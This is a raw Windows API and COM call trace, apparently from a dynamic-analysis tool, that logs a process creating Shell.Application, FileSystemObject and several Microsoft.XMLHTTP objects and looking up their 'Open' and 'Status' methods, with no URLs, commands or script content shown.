	[0728.885] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0728.885] SysStringLen (param_1=0x0) returned 0x0
	[0728.885] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0728.886] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0728.886] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0728.886] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0728.886] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0728.886] ??2@YAPEAX_K@Z () returned 0x62f350
	[0728.886] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0728.886] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0728.886] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0728.886] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0728.886] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0728.886] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0728.886] SysStringLen (param_1=0x0) returned 0x0
	[0728.886] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0728.890] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0728.890] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0728.890] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0728.890] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0728.890] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0728.890] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0731.135] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0731.135] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0731.135] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0731.137] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0731.137] SysStringLen (param_1=0x0) returned 0x0
	[0731.137] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0731.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0731.137] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0731.137] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0731.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0731.137] ??2@YAPEAX_K@Z () returned 0x62f330
	[0731.137] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0731.137] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0731.138] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0731.138] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0731.138] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0731.138] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0731.138] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0731.141] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0731.141] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0731.141] SysStringLen (param_1=0x0) returned 0x0
	[0731.141] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0731.141] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0731.141] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74c0) returned 0x0
	[0731.141] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0731.141] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7528) returned 0x0
	[0731.141] ??2@YAPEAX_K@Z () returned 0x62f310
	[0731.141] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7528, pUnkSite=0x62f310) 
	[0731.142] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0731.142] XMLHTTPRequest:IUnknown:Release (This=0x49c7528) returned 0x0
	[0731.142] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74c0) returned 0x0
	[0731.142] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74c0) returned 0x3
	[0731.142] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0731.142] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74c0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0731.142] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74c0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0731.142] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0731.142] SysStringLen (param_1=0x0) returned 0x0
	[0731.142] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0731.142] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0731.142] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c30) returned 0x0
	[0731.143] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0731.143] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0731.143] ??2@YAPEAX_K@Z () returned 0x62f330
	[0731.143] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0731.143] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0731.143] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0731.143] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c30) returned 0x0
	[0731.143] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c30) returned 0x3
	[0731.143] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0731.143] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0731.143] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0731.143] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0731.143] SysStringLen (param_1=0x0) returned 0x0
	[0731.143] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0731.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0731.144] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7520) returned 0x0
	[0731.144] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0731.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b98) returned 0x0
	[0731.144] ??2@YAPEAX_K@Z () returned 0x62f310
	[0731.144] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b98, pUnkSite=0x62f310) 
	[0731.144] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0731.144] XMLHTTPRequest:IUnknown:Release (This=0x49c5b98) returned 0x0
	[0731.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7520) returned 0x0
	[0731.144] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7520) returned 0x3
	[0731.144] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0731.145] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7520, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0731.145] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0731.145] longjmp () 
	[0731.145] longjmp () 
	[0731.145] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0731.145] SysStringLen (param_1=0x0) returned 0x0
	[0731.145] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0731.145] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0731.145] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0731.145] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0731.145] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0731.146] ??2@YAPEAX_K@Z () returned 0x62f330
	[0731.146] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0731.146] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0731.146] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0731.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0731.146] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0731.146] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
